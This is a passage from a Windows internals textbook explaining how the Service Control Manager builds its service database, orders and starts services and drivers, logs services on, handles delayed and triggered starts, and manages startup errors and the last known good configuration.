nonvisible window station named Service-0x0-3e7$ that all noninteractive
services share. The number in the name, 3e7, represents the logon session
identifier that the Local Security Authority process (LSASS) assigns to the
logon session the SCM uses for noninteractive services running in the local
system account. In a similar way, services running in the Local service
account are associated with the window station generated by the logon
session 3e5, while services running in the network service account are
associated with the window station generated by the logon session 3e4.
Services configured to run under a user account (that is, not the local
system account) are run in a different nonvisible window station named with
the LSASS logon identifier assigned for the service’s logon session. Figure
10-13 shows a sample display from the Sysinternals WinObj tool that shows
the object manager directory in which Windows places window station
objects. Visible are the interactive window station (WinSta0) and the three
noninteractive services window stations.
Figure 10-13 List of window stations.
Regardless of whether services are running in a user account, the local
system account, or the local or network service accounts, services that aren’t
running on the visible window station can’t receive input from a user or
display visible windows. In fact, if a service were to pop up a modal dialog
box, the service would appear hung because no user would be able to see the
dialog box, which of course would prevent the user from providing keyboard
or mouse input to dismiss it and allow the service to continue executing.
A service could have a valid reason to interact with the user via dialog
boxes or windows. Services configured using the
SERVICE_INTERACTIVE_PROCESS flag in the service’s registry key’s
Type parameter are launched with a hosting process connected to the
interactive WinSta0 window station. (Note that services configured to run
under a user account can’t be marked as interactive.) Were user processes to
run in the same session as services, this connection to WinSta0 would allow
the service to display dialog boxes and windows and enable those windows
to respond to user input because they would share the window station with
the interactive services. However, only processes owned by the system and
Windows services run in session 0; all other logon sessions, including those
of console users, run in different sessions. Therefore, any window displayed
by processes in session 0 is not visible to the user.
This additional boundary helps prevent shatter attacks, whereby a less-
privileged application sends window messages to a window visible on the
same window station to exploit a bug in a more privileged process that owns
the window, which permits it to execute code in the more privileged process.
In the past, Windows included the Interactive Services Detection service
(UI0Detect), which notified users when a service had displayed a window on
the main desktop of the WinSta0 window station of Session 0. This would
allow the user to switch to the session 0’s window station, making interactive
services run properly. For security purposes, this feature was first disabled;
since Windows 10 April 2018 Update (RS4), it has been completely
removed.
As a result, even though interactive services are still supported by the
Service Control Manager (only by setting the
HKLM\SYSTEM\CurrentControlSet\Control\Windows\NoInteractiveService
s registry value to 0), access to session 0 is no longer possible. No service
can display any window anymore (at least without some undocumented
hack).
The Service Control Manager (SCM)
The SCM’s executable file is %SystemRoot%\System32\Services.exe, and
like most service processes, it runs as a Windows console program. The
Wininit process starts the SCM early during the system boot. (Refer to
Chapter 12 for details on the boot process.) The SCM’s startup function,
SvcCtrlMain, orchestrates the launching of services that are configured for
automatic startup.
SvcCtrlMain first performs its own initialization by setting its process
secure mitigations and unhandled exception filter and by creating an in-
memory representation of the well-known SIDs. It then creates two
synchronization events: one named SvcctrlStartEvent_A3752DX and the
other named SC_AutoStartComplete. Both are initialized as nonsignaled. The
first event is signaled by the SCM after all the steps necessary to receive
commands from SCPs are completed. The second is signaled when the entire
initialization of the SCM is completed. The event is used for preventing the
system or other users from starting another instance of the Service Control
Manager. The function that an SCP uses to establish a dialog with the SCM
is OpenSCManager. OpenSCManager prevents an SCP from trying to
contact the SCM before the SCM has initialized by waiting for
SvcctrlStartEvent_A3752DX to become signaled.
Next, SvcCtrlMain gets down to business, creates a proper security
descriptor, and calls ScGenerateServiceDB, the function that builds the
SCM’s internal service database. ScGenerateServiceDB reads and stores the
contents of
HKLM\SYSTEM\CurrentControlSet\Control\ServiceGroupOrder\List, a
REG_MULTI_SZ value that lists the names and order of the defined service
groups. A service’s registry key contains an optional Group value if that
service or device driver needs to control its startup ordering with respect to
services from other groups. For example, the Windows networking stack is
built from the bottom up, so networking services must specify Group values
that place them later in the startup sequence than networking device drivers.
The SCM internally creates a group list that preserves the ordering of the
groups it reads from the registry. Groups include (but are not limited to)
NDIS, TDI, Primary Disk, Keyboard Port, Keyboard Class, Filters, and so
on. Add-on and third-party applications can even define their own groups and
add them to the list. Microsoft Transaction Server, for example, adds a group
named MS Transactions.
ScGenerateServiceDB then scans the contents of
HKLM\SYSTEM\CurrentControlSet\Services, creating an entry (called
“service record”) in the service database for each key it encounters. A
database entry includes all the service-related parameters defined for a
service as well as fields that track the service’s status. The SCM adds entries
for device drivers as well as for services because the SCM starts services and
drivers marked as autostart and detects startup failures for drivers marked
boot-start and system-start. It also provides a means for applications to query
the status of drivers. The I/O manager loads drivers marked boot-start and
system-start before any user-mode processes execute, and therefore any
drivers having these start types load before the SCM starts.
ScGenerateServiceDB reads a service’s Group value to determine its
membership in a group and associates this value with the group’s entry in the
group list created earlier. The function also reads and records in the database
the service’s group and service dependencies by querying its
DependOnGroup and DependOnService registry values. Figure 10-14 shows
how the SCM organizes the service entry and group order lists. Notice that
the service list is sorted alphabetically. The reason this list is sorted
alphabetically is that the SCM creates the list from the Services registry key,
and Windows enumerates registry keys alphabetically.
Figure 10-14 Organization of the service database.
During service startup, the SCM calls on LSASS (for example, to log on a
service in a nonlocal system account), so the SCM waits for LSASS to signal
the LSA_RPC_SERVER_ACTIVE synchronization event, which it does when
it finishes initializing. Wininit also starts the LSASS process, so the
initialization of LSASS is concurrent with that of the SCM, and the order in
which LSASS and the SCM complete initialization can vary. The SCM
cleans up (from the registry, other than from the database) all the services
that were marked as deleted (through the DeleteFlag registry value) and
generates the dependency list for each service record in the database. This
allows the SCM to know which service is dependent on a particular service
record, which is the opposite dependency information compared to the one
stored in the registry.
The SCM then queries whether the system is started in safe mode (from
the HKLM\System\CurrentControlSet\
Control\Safeboot\Option\OptionValue registry value). This check is needed
for determining later if a service should start (details are explained in the
“Autostart services startup” section later in this chapter). It then creates its
remote procedure call (RPC) named pipe, which is named \Pipe\Ntsvcs, and
then RPC launches a thread to listen on the pipe for incoming messages from
SCPs. The SCM signals its initialization-complete event,
SvcctrlStartEvent_A3752DX. Registering a console application shutdown
event handler and registering with the Windows subsystem process via
RegisterServiceProcess prepares the SCM for system shutdown.
Before starting the autostart services, the SCM performs a few more steps.
It initializes the UMDF driver manager, which is responsible in managing
UMDF drivers. Since Windows 10 Fall Creators Update (RS3), it’s part of
the Service Control Manager and waits for the known DLLs to be fully
initialized (by waiting on the \KnownDlls\SmKnownDllsInitialized event
that’s signaled by Session Manager).
EXPERIMENT: Enable services logging
The Service Control Manager usually logs ETW events only when
it detects abnormal error conditions (for example, while failing to
start a service or to change its configuration). This behavior can be
overridden by manually enabling or disabling a different kind of
SCM events. In this experiment, you will enable two kinds of
events that are particularly useful for debugging a service change of
state. Events 7036 and 7042 are raised when a service change status
or when a STOP control request is sent to a service.
Those two events are enabled by default on server SKUs but not
on client editions of Windows 10. Using your Windows 10
machine, you should open the Registry Editor (by typing
regedit.exe in the Cortana search box) and navigate to the
following registry key:
HKLM\SYSTEM\CurrentControlSet\Control\ScEvents. If the last
subkey does not exist, you should create it by right-clicking the
Control subkey and selecting the Key item from the New context
menu).
Now you should create two DWORD values and name them
7036 and 7042. Set the data of the two values to 1. (You can set
them to 0 to gain the opposite effect of preventing those events
from being generated, even on Server SKUs.) You should get a
registry state like the following one:
Restart your workstation, and then start and stop a service (for
example, the AppXSvc service) using the sc.exe tool by opening an
administrative command prompt and typing the following
commands:
Click here to view code image
sc stop AppXSvc
sc start AppXSvc
Open the Event Viewer (by typing eventvwr in the Cortana
search box) and navigate to Windows Logs and then System. You
should note different events from the Service Control Manager
with Event ID 7036 and 7042. In the top ones, you should find the
stop event generated by the AppXSvc service, as shown in the
following figure:
Note that the Service Control Manager by default logs all the
events generated by services started automatically at system
startup. This can generate an undesired number of events flooding
the System event log. To mitigate the problem, you can disable
SCM autostart events by creating a registry value named
EnableAutostartEvents in the
HKLM\System\CurrentControlSet\Control key and set it to 0 (the
default implicit value is 1 in both client and server SKUs). As a
result, this will log only events generated by service applications
when starting, pausing, or stopping a target service.
Network drive letters
In addition to its role as an interface to services, the SCM has another totally
unrelated responsibility: It notifies GUI applications in a system whenever
the system creates or deletes a network drive-letter connection. The SCM
waits for the Multiple Provider Router (MPR) to signal a named event,
\BaseNamedObjects\ScNetDrvMsg, which MPR signals whenever an
application assigns a drive letter to a remote network share or deletes a
remote-share drive-letter assignment. When MPR signals the event, the SCM
calls the GetDriveType Windows function to query the list of connected
network drive letters. If the list changes across the event signal, the SCM
sends a Windows broadcast message of type WM_DEVICECHANGE. The
SCM uses either DBT_DEVICEREMOVECOMPLETE or
DBT_DEVICEARRIVAL as the message’s subtype. This message is primarily
intended for Windows Explorer so that it can update any open computer
windows to show the presence or absence of a network drive letter.
Service control programs
As introduced in the “Service applications” section, service control programs
(SCPs) are standard Windows applications that use SCM service
management functions, including CreateService, OpenService, StartService,
ControlService, QueryServiceStatus, and DeleteService. To use the SCM
functions, an SCP must first open a communications channel to the SCM by
calling the OpenSCManager function to specify what types of actions it
wants to perform. For example, if an SCP simply wants to enumerate and
display the services present in the SCM’s database, it requests enumerate-
service access in its call to OpenSCManager. During its initialization, the
SCM creates an internal object that represents the SCM database and uses the
Windows security functions to protect the object with a security descriptor
that specifies what accounts can open the object with what access
permissions. For example, the security descriptor indicates that the
Authenticated Users group can open the SCM object with enumerate-service
access. However, only administrators can open the object with the access
required to create or delete a service.
As it does for the SCM database, the SCM implements security for
services themselves. When an SCP creates a service by using the
CreateService function, it specifies a security descriptor that the SCM
associates internally with the service’s entry in the service database. The
SCM stores the security descriptor in the service’s registry key as the
Security value, and it reads that value when it scans the registry’s Services
key during initialization so that the security settings persist across reboots. In
the same way that an SCP must specify what types of access it wants to the
SCM database in its call to OpenSCManager, an SCP must tell the SCM
what access it wants to a service in a call to OpenService. Accesses that an
SCP can request include the ability to query a service’s status and to
configure, stop, and start a service.
The SCP you’re probably most familiar with is the Services MMC snap-in
that’s included in Windows, which resides in
%SystemRoot%\System32\Filemgmt.dll. Windows also includes Sc.exe
(Service Controller tool), a command-line service control program that we’ve
mentioned multiple times.
SCPs sometimes layer service policy on top of what the SCM implements.
A good example is the timeout that the Services MMC snap-in implements
when a service is started manually. The snap-in presents a progress bar that
represents the progress of a service’s startup. Services indirectly interact with
SCPs by setting their configuration status to reflect their progress as they
respond to SCM commands such as the start command. SCPs query the
status with the QueryServiceStatus function. They can tell when a service
actively updates the status versus when a service appears to be hung, and the
SCM can take appropriate actions in notifying a user about what the service
is doing.
Autostart services startup
SvcCtrlMain invokes the SCM function ScAutoStartServices to start all
services that have a Start value designating autostart (except delayed autostart
and user services). ScAutoStartServices also starts autostart drivers. To avoid
confusion, you should assume that the term services means services and
drivers unless indicated otherwise. ScAutoStartServices begins by starting
two important and basic services, named Plug and Play (implemented in the
Umpnpmgr.dll library) and Power (implemented in the Umpo.dll library),
which are needed by the system for managing plug-and-play hardware and
power interfaces. The SCM then registers its Autostart WNF state, used to
indicate the current autostart phase to the Power and other services.
Before the starting of other services can begin, the ScAutoStartService
routine calls ScGetBootAnd SystemDriverState to scan the service database
looking for boot-start and system-start device driver entries.
ScGetBootAndSystemDriverState determines whether a driver with the start
type set to Boot Start or System Start successfully started by looking up its
name in the object manager namespace directory named \Driver. When a
device driver successfully loads, the I/O manager inserts the driver’s object
in the namespace under this directory, so if its name isn’t present, it hasn’t
loaded. Figure 10-15 shows WinObj displaying the contents of the Driver
directory. ScGetBootAndSystemDriverState notes the names of drivers that
haven’t started and that are part of the current profile in a list named
ScStoppedDrivers. The list will be used later at the end of the SCM
initialization for logging an event to the system event log (ID 7036), which
contains the list of boot drivers that have failed to start.
Figure 10-15 List of driver objects.
The algorithm in ScAutoStartServices for starting services in the correct
order proceeds in phases, whereby a phase corresponds to a group and phases
proceed in the sequence defined by the group ordering stored in the
HKLM\SYSTEM\CurrentControlSet\Control\ServiceGroupOrder\List
registry value. The List value, shown in Figure 10-16, includes the names of
groups in the order that the SCM should start them. Thus, assigning a service
to a group has no effect other than to fine-tune its startup with respect to
other services belonging to different groups.
Figure 10-16 ServiceGroupOrder registry key.
When a phase starts, ScAutoStartServices marks all the service entries
belonging to the phase’s group for startup. Then ScAutoStartServices loops
through the marked services to see whether it can start each one. Part of this
check includes seeing whether the service is marked as delayed autostart or a
user template service; in both cases, the SCM will start it at a later stage.
(Delayed autostart services must also be ungrouped. User services are
discussed later in the “User services” section.) Another part of the check it
makes consists of determining whether the service has a dependency on
another group, as specified by the existence of the DependOnGroup value in
the service’s registry key. If a dependency exists, the group on which the
service is dependent must have already initialized, and at least one service of
that group must have successfully started. If the service depends on a group
that starts later than the service’s group in the group startup sequence, the
SCM notes a “circular dependency” error for the service. If
ScAutoStartServices is considering a Windows service or an autostart device
driver, it next checks to see whether the service depends on one or more
other services; if it is dependent, it determines whether those services have
already started. Service dependencies are indicated with the
DependOnService registry value in a service’s registry key. If a service
depends on other services that belong to groups that come later in the
ServiceGroupOrder\List, the SCM also generates a “circular dependency”
error and doesn’t start the service. If the service depends on any services
from the same group that haven’t yet started, the service is skipped.
When the dependencies of a service have been satisfied,
ScAutoStartServices makes a final check to see whether the service is part of
the current boot configuration before starting the service. When the system is
booted in safe mode, the SCM ensures that the service is either identified by
name or by group in the appropriate safe boot registry key. There are two
safe boot keys, Minimal and Network, under
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot, and the one that the
SCM checks depends on what safe mode the user booted. If the user chose
Safe Mode or Safe Mode With Command Prompt at the modern or legacy
boot menu, the SCM references the Minimal key; if the user chose Safe
Mode With Networking, the SCM refers to Network. The existence of a
string value named Option under the SafeBoot key indicates not only that the
system booted in safe mode but also the type of safe mode the user selected.
For more information about safe boots, see the section “Safe mode” in
Chapter 12.
Service start
Once the SCM decides to start a service, it calls StartInternal, which takes
different steps for services than for device drivers. When StartInternal starts
a Windows service, it first determines the name of the file that runs the
service’s process by reading the ImagePath value from the service’s registry
key. If the service file corresponds to LSASS.exe, the SCM initializes a
control pipe, connects to the already-running LSASS process, and waits for
the LSASS process response. When the pipe is ready, the LSASS process
connects to the SCM by calling the classical StartServiceCtrlDispatcher
routine. As shown in Figure 10-17, some services like Credential Manager or
Encrypting File System need to cooperate with the Local Security Authority
Subsystem Service (LSASS)—usually for performing cryptography operation
for the local system policies (like passwords, privileges, and security
auditing. See Chapter 7 of Part 1 for more details).
Figure 10-17 Services hosted by the Local Security Authority Subsystem
Service (LSASS) process.
The SCM then determines whether the service is critical (by analyzing the
FailureAction registry value) or is running under WoW64. (If the service is a
32-bit service, the SCM should apply file system redirection. See the
“WoW64” section of Chapter 8 for more details.) It also examines the
service’s Type value. If the following conditions apply, the SCM initiates a
search in the internal Image Record Database:
■ The service type value includes
SERVICE_WINDOWS_SHARE_PROCESS (0x20).
■ The service has not been restarted after an error.
■ Svchost service splitting is not allowed for the service (see the
“Svchost service splitting” section later in this chapter for further
details).
An Image record is a data structure that represents a launched process
hosting at least one service. If the preceding conditions apply, the SCM
searches an image record that has the same process executable’s name as the
new service ImagePath value.
If the SCM locates an existing image database entry with matching
ImagePath data, the service can be shared, and one of the hosting processes is
already running. The SCM ensures that the found hosting process is logged
on using the same account as the one specified for the service being started.
(This is to ensure that the service is not configured with the wrong account,
such as a LocalService account, but with an image path pointing to a running
Svchost, such as netsvcs, which runs as LocalSystem.) A service’s
ObjectName registry value stores the user account in which the service
should run. A service with no ObjectName or an ObjectName of
LocalSystem runs in the local system account. A process can be logged on as
only one account, so the SCM reports an error when a service specifies a
different account name than another service that has already started in the
same process.
If the image record exists, before the new service can be run, another final
check should be performed: The SCM opens the token of the currently
executing host process and checks whether the necessary service SID is
located in the token (and all the required privileges are enabled). Even in this
case, the SCM reports an error if the condition is not verified. Note that, as
we describe in the next section (“Service logon”), for shared services, all the
SIDs of the hosted services are added at token creation time. It is not possible
for any user-mode component to add group SIDs in a token after the token
has already been created.
If the image database doesn’t have an entry for the new service ImagePath
value, the SCM creates one. When the SCM creates a new entry, it stores the
logon account name used for the service and the data from the service’s
ImagePath value. The SCM requires services to have an ImagePath value. If
a service doesn’t have an ImagePath value, the SCM reports an error stating
that it couldn’t find the service’s path and isn’t able to start the service. After
the SCM creates an image record, it logs on the service account and starts the
new hosting process. (The procedure is described in the next section,
“Service logon.”)
After the service has been logged in, and the host process correctly started,
the SCM waits for the initial “connection” message from the service. The
service connects to SCM thanks to the SCM RPC pipe (\Pipe\Ntsvcs, as
described in the “The Service Control Manager” section) and to a Channel
Context data structure built by the LogonAndStartImage routine. When the
SCM receives the first message, it proceeds to start the service by posting a
SERVICE_CONTROL_START control message to the service process. Note
that in the described communication protocol is always the service that
connects to SCM.
The service application is able to process the message thanks to the
message loop located in the StartServiceCtrlDispatcher API (see the
“Service applications” section earlier in this chapter for more details). The
service application enables the service group SID in its token (if needed) and
creates the new service thread (which will execute the Service Main
function). It then calls back into the SCM for creating a handle to the new
service, storing it in an internal data structure
(INTERNAL_DISPATCH_TABLE) similar to the service table specified as
input to the StartServiceCtrlDispatcher API. The data structure is used for
tracking the active services in the hosting process. If the service fails to
respond positively to the start command within the timeout period, the SCM
gives up and notes an error in the system Event Log that indicates the service
failed to start in a timely manner.
If the service the SCM starts with a call to StartInternal has a Type registry
value of SERVICE_KERNEL_DRIVER or
SERVICE_FILE_SYSTEM_DRIVER, the service is really a device driver, so
StartInternal enables the load driver security privilege for the SCM process
and then invokes the kernel service NtLoadDriver, passing in the data in the
ImagePath value of the driver’s registry key. Unlike services, drivers don’t
need to specify an ImagePath value, and if the value is absent, the SCM
builds an image path by appending the driver’s name to the string
%SystemRoot%\System32\ Drivers\.
Note
A device driver with the start value of SERVICE_AUTO_START or
SERVICE_DEMAND_START is started by the SCM as a runtime driver,
which implies that the resulting loaded image uses shared pages and has a
control area that describes them. This is different than drivers with the
start value of SERVICE_BOOT_START or SERVICE_SYSTEM_START,
which are loaded by the Windows Loader and started by the I/O manager.
Those drivers all use private pages and are neither sharable nor have an
associated Control Area.
More details are available in Chapter 5 in Part 1.
ScAutoStartServices continues looping through the services belonging to a
group until all the services have either started or generated dependency
errors. This looping is the SCM’s way of automatically ordering services
within a group according to their DependOnService dependencies. The SCM
starts the services that other services depend on in earlier loops, skipping the
dependent services until subsequent loops. Note that the SCM ignores Tag
values for Windows services, which you might come across in subkeys under
the HKLM\SYSTEM\CurrentControlSet\Services key; the I/O manager
honors Tag values to order device driver startup within a group for boot-start
and system-start drivers. Once the SCM completes phases for all the groups
listed in the ServiceGroupOrder\List value, it performs a phase for services
belonging to groups not listed in the value and then executes a final phase for
services without a group.
After handling autostart services, the SCM calls ScInitDelayStart, which
queues a delayed work item associated with a worker thread responsible for
processing all the services that ScAutoStartServices skipped because they
were marked delayed autostart (through the DelayedAutostart registry value).
This worker thread will execute after the delay. The default delay is 120
seconds, but it can be overridden by the creating an AutoStartDelay value in
HKLM\SYSTEM\CurrentControlSet\Control. The SCM performs the same
actions as those executed during startup of nondelayed autostart services.
When the SCM finishes starting all autostart services and drivers, as well
as setting up the delayed autostart work item, the SCM signals the event
\BaseNamedObjects\SC_AutoStartComplete. This event is used by the
Windows Setup program to gauge startup progress during installation.
Service logon
During the start procedure, if the SCM does not find any existing image
record, it means that the host process needs to be created. Indeed, the new
service is not shareable, it’s the first one to be executed, it has been restarted,
or it’s a user service. Before starting the process, the SCM should create an
access token for the service host process. The LogonAndStartImage
function’s goal is to create the token and start the service’s host process. The
procedure depends on the type of service that will be started.
User services (more precisely user service instances) are started by
retrieving the current logged-on user token (through functions implemented
in the UserMgr.dll library). In this case, the LogonAndStartImage function
duplicates the user token and adds the “WIN://ScmUserService” security
attribute (the attribute value is usually set to 0). This security attribute is used
primarily by the Service Control Manager when receiving connection
requests from the service. Although SCM can recognize a process that’s
hosting a classical service through the service SID (or the System account
SID if the service is running under the Local System Account), it uses the
SCM security attribute for identifying a process that’s hosting a user service.
For all other type of services, the SCM reads the account under which the
service will be started from the registry (from the ObjectName value) and
calls ScCreateServiceSids with the goal to create a service SID for each
service that will be hosted by the new process. (The SCM cycles between
each service in its internal service database.) Note that if the service runs
under the LocalSystem account (with no restricted nor unrestricted SID), this
step is not executed.
The SCM logs on services that don’t run in the System account by calling
the LSASS function LogonUserExEx. LogonUserExEx normally requires a
password, but normally the SCM indicates to LSASS that the password is
stored as a service’s LSASS “secret” under the key
HKLM\SECURITY\Policy\Secrets in the registry. (Keep in mind that the
contents of SECURITY aren’t typically visible because its default security
settings permit access only from the System account.) When the SCM calls
LogonUserExEx, it specifies a service logon as the logon type, so LSASS
looks up the password in the Secrets subkey that has a name in the form
_SC_<Service Name>.
Note
Services running with a virtual service account do not need a password
for having their service token created by the LSA service. For those
services, the SCM does not provide any password to the LogonUserExEx
API.
The SCM directs LSASS to store a logon password as a secret using the
LsaStorePrivateData function when an SCP configures a service’s logon
information. When a logon is successful, LogonUserEx returns a handle to an
access token to the caller. The SCM adds the necessary service SIDs to the
returned token, and, if the new service uses restricted SIDs, invokes the
ScMakeServiceTokenWriteRestricted function, which transforms the token in
a write-restricted token (adding the proper restricted SIDs). Windows uses
access tokens to represent a user’s security context, and the SCM later
associates the access token with the process that implements the service.
Next, the SCM creates the user environment block and security descriptor
to associate with the new service process. In case the service that will be
started is a packaged service, the SCM reads all the package information
from the registry (package full name, origin, and application user model ID)
and calls the Appinfo service, which stamps the token with the necessary
AppModel security attributes and prepares the service process for the modern
package activation. (See the “Packaged applications” section in Chapter 8 for
more details about the AppModel.)
After a successful logon, the SCM loads the account’s profile information,
if it’s not already loaded, by calling the User Profile Basic Api DLL’s
(%SystemRoot%\System32\Profapi.dll) LoadProfileBasic function. The
value HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\ProfileList\<user profile key>\ProfileImagePath contains
the location on disk of a registry hive that LoadUserProfile loads into the
registry, making the information in the hive the HKEY_CURRENT_USER
key for the service.
As its next step, LogonAndStartImage proceeds to launch the service’s
process. The SCM starts the process in a suspended state with the
CreateProcessAsUser Windows function. (Except for a process hosting
services under a local system account, which are created through the standard
CreateProcess API. The SCM already runs with a SYSTEM token, so there
is no need of any other logon.)
Before the process is resumed, the SCM creates the communication data
structure that allows the service application and the SCM to communicate
through asynchronous RPCs. The data structure contains a control sequence,
a pointer to a control and response buffer, service and hosting process data
(like the PID, the service SID, and so on), a synchronization event, and a
pointer to the async RPC state.
The SCM resumes the service process via the ResumeThread function and
waits for the service to connect to its SCM pipe. If it exists, the registry value
HKLM\SYSTEM\CurrentControlSet\Control\ServicesPipeTimeout
determines the length of time that the SCM waits for a service to call
StartServiceCtrlDispatcher and connect before it gives up, terminates the
process, and concludes that the service failed to start (note that in this case
the SCM terminates the process, unlike when the service doesn’t respond to
the start request, discussed previously in the “Service start” section). If
ServicesPipeTimeout doesn’t exist, the SCM uses a default timeout of 30
seconds. The SCM uses the same timeout value for all its service
communications.
Delayed autostart services
Delayed autostart services enable Windows to cope with the growing number
of services that are being started when a user logs on, which bogs down the
boot-up process and increases the time before a user is able to get
responsiveness from the desktop. The design of autostart services was
primarily intended for services required early in the boot process because
other services depend on them, a good example being the RPC service, on
which all other services depend. The other use was to allow unattended
startup of a service, such as the Windows Update service. Because many
autostart services fall in this second category, marking them as delayed
autostart allows critical services to start faster and for the user’s desktop to be
ready sooner when a user logs on immediately after booting. Additionally,
these services run in background mode, which lowers their thread, I/O, and
memory priority. Configuring a service for delayed autostart requires calling
the ChangeServiceConfig2 API. You can check the state of the flag for a
service by using the qc option of sc.exe.
Note
If a nondelayed autostart service has a delayed autostart service as one of
its dependencies, the delayed autostart flag is ignored and the service is
started immediately to satisfy the dependency.
Triggered-start services
Some services need to be started on demand, after certain system events
occur. For that reason, Windows 7 introduced the concept of triggered-start
service. A service control program can use the ChangeServiceConfig2 API
(by specifying the SERVICE_CONFIG_TRIGGER_INFO information level)
for configuring a demand-start service to be started (or stopped) after one or
more system events occur. Examples of system events include the following:
■ A specific device interface is connected to the system.
■ The computer joins or leaves a domain.
■ A TCP/IP port is opened or closed in the system firewall.
■ A machine or user policy has been changed.
■ An IP address on the network TCP/IP stack becomes available or
unavailable.
■ A RPC request or Named pipe packet arrives on a particular interface.
■ An ETW event has been generated in the system.
The first implementation of triggered-start services relied on the Unified
Background Process Manager (see the next section for details). Windows 8.1
introduced the Broker Infrastructure, which had the main goal of managing
multiple system events targeted to Modern apps. All the previously listed
events have been thus begun to be managed by mainly three brokers, which
are all parts of the Broker Infrastructure (with the exception of the Event
Aggregation): Desktop Activity Broker, System Event Broker, and the Event
Aggregation. More information on the Broker Infrastructure is available in
the “Packaged applications” section of Chapter 8.
After the first phase of ScAutoStartServices is complete (which usually
starts critical services listed in the
HKLM\SYSTEM\CurrentControlSet\Control\EarlyStartServices registry
value), the SCM calls ScRegisterServicesForTriggerAction, the function
responsible in registering the triggers for each triggered-start service. The
routine cycles between each Win32 service located in the SCM database. For
each service, the function generates a temporary WNF state name (using the
NtCreateWnfStateName native API), protected by a proper security
descriptor, and publishes it with the service status stored as state data. (WNF
architecture is described in the “Windows Notification Facility” section of
Chapter 8.) This WNF state name is used for publishing services status
changes. The routine then queries all the service triggers from the
TriggerInfo registry key, checking their validity and bailing out in case no
triggers are available.
Note
The list of supported triggers, described previously, together with their
parameters, is documented at https://docs.microsoft.com/en-
us/windows/win32/api/winsvc/ns-winsvc-service_trigger.
If the check succeeded, for each trigger the SCM builds an internal data
structure containing all the trigger information (like the targeted service
name, SID, broker name, and trigger parameters) and determines the correct
broker based on the trigger type: external devices events are managed by the
System Events broker, while all the other types of events are managed by the
Desktop Activity broker. The SCM at this stage is able to call the proper
broker registration routine. The registration process is private and depends on
the broker: multiple private WNF state names (which are broker specific) are
generated for each trigger and condition.
The Event Aggregation broker is the glue between the private WNF state
names published by the two brokers and the Service Control Manager. It
subscribes to all the WNF state names corresponding to the triggers and the
conditions (by using the RtlSubscribeWnfStateChangeNotification API).
When enough WNF state names have been signaled, the Event Aggregation
calls back the SCM, which can start or stop the triggered start service.
Differently from the WNF state names used for each trigger, the SCM
always independently publishes a WNF state name for each Win32 service
whether or not the service has registered some triggers. This is because an
SCP can receive notification when the specified service status changes by
invoking the NotifyServiceStatusChange API, which subscribes to the
service’s status WNF state name. Every time the SCM raises an event that
changes the status of a service, it publishes new state data to the “service
status change” WNF state, which wakes up a thread running the status
change callback function in the SCP.
Startup errors
If a driver or a service reports an error in response to the SCM’s startup
command, the ErrorControl value of the service’s registry key determines
how the SCM reacts. If the ErrorControl value is
SERVICE_ERROR_IGNORE (0) or the ErrorControl value isn’t specified,
the SCM simply ignores the error and continues processing service startups.
If the ErrorControl value is SERVICE_ERROR_NORMAL (1), the SCM
writes an event to the system Event Log that says, “The <service name>
service failed to start due to the following error.” The SCM includes the
textual representation of the Windows error code that the service returned to
the SCM as the reason for the startup failure in the Event Log record. Figure
10-18 shows the Event Log entry that reports a service startup error.
Figure 10-18 Service startup failure Event Log entry.
If a service with an ErrorControl value of SERVICE_ERROR_SEVERE
(2) or SERVICE_ERROR_CRITICAL (3) reports a startup error, the SCM
logs a record to the Event Log and then calls the internal function
ScRevertToLastKnownGood. This function checks whether the last known
good feature is enabled, and, if so, switches the system’s registry
configuration to a version, named last known good, with which the system
last booted successfully. Then it restarts the system using the
NtShutdownSystem system service, which is implemented in the executive. If
the system is already booting with the last known good configuration, or if
the last known good configuration is not enabled, the SCM does nothing
more than emit a log event.
Accepting the boot and last known good
Besides starting services, the system charges the SCM with determining
when the system’s registry configuration,
HKLM\SYSTEM\CurrentControlSet, should be saved as the last known good
control set. The CurrentControlSet key contains the Services key as a subkey,
so CurrentControlSet includes the registry representation of the SCM
database. It also contains the Control key, which stores many kernel-mode
and user-mode subsystem configuration settings. By default, a successful
boot consists of a successful startup of autostart services and a successful
user logon. A boot fails if the system halts because a device driver crashes the
system during the boot or if an autostart service with an ErrorControl value
of SERVICE_ERROR_SEVERE or SERVICE_ERROR_CRITICAL reports a
startup error.
The last known good configuration feature is usually disabled in the client
version of Windows. It can be enabled by setting the
HKLM\SYSTEM\CurrentControlSet\Control\Session
Manager\Configuration Manager\LastKnownGood\Enabled registry value to
1. In Server SKUs of Windows, the value is enabled by default.
The SCM knows when it has completed a successful startup of the
autostart services, but Winlogon (%SystemRoot%\System32\Winlogon.exe)
must notify it when there is a successful logon. Winlogon invokes the
NotifyBootConfigStatus function when a user logs on, and
NotifyBootConfigStatus sends a message to the SCM. Following the
successful start of the autostart services or the receipt of the message from
NotifyBootConfigStatus (whichever comes last), if the last known good
feature is enabled, the SCM calls the system function NtInitializeRegistry to
save the current registry startup configuration.
Third-party software developers can supersede Winlogon’s definition of a
successful logon with their own definition. For example, a system running
Microsoft SQL Server might not consider a boot successful until after SQL
Server is able to accept and process transactions. Developers impose their
definition of a successful boot by writing a boot-verification program and
installing the program by pointing to its location on disk with the value
stored in the registry key
HKLM\SYSTEM\CurrentControlSet\Control\BootVerificationProgram. In
addition, a boot-verification program’s installation must disable Winlogon’s
call to NotifyBootConfigStatus by setting
HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\ReportBootOk to 0. When a boot-verification
program is installed, the SCM launches it after finishing autostart services
and waits for the program’s call to NotifyBootConfigStatus before saving the
last known good control set.
Windows maintains several copies of CurrentControlSet, and
CurrentControlSet is really a symbolic registry link that points to one of the
copies. The control sets have names in the form
HKLM\SYSTEM\ControlSetnnn, where nnn is a number such as 001 or 002.
The HKLM\SYSTEM\Select key contains values that identify the role of
each control set. For example, if CurrentControlSet points to ControlSet001,
the Current value under Select has a value of 1. The LastKnownGood value
under Select contains the number of the last known good control set, which is
the control set last used to boot successfully. Another value that might be on
your system under the Select key is Failed, which points to the last control set
for which the boot was deemed unsuccessful and aborted in favor of an
attempt at booting with the last known good control set. Figure 10-19
displays a Windows Server system’s control sets and Select values.
Figure 10-19 Control set selection key on Windows Server 2019.
NtInitializeRegistry takes the contents of the last known good control set
and synchronizes it with that of the CurrentControlSet key’s tree. If this was
the system’s first successful boot, the last known good won’t exist, and the
system will create a new control set for it. If the last known good tree exists,
the system simply updates it with differences between it and
CurrentControlSet.
Last known good is helpful in situations in which a change to
CurrentControlSet, such as the modification of a system performance-tuning
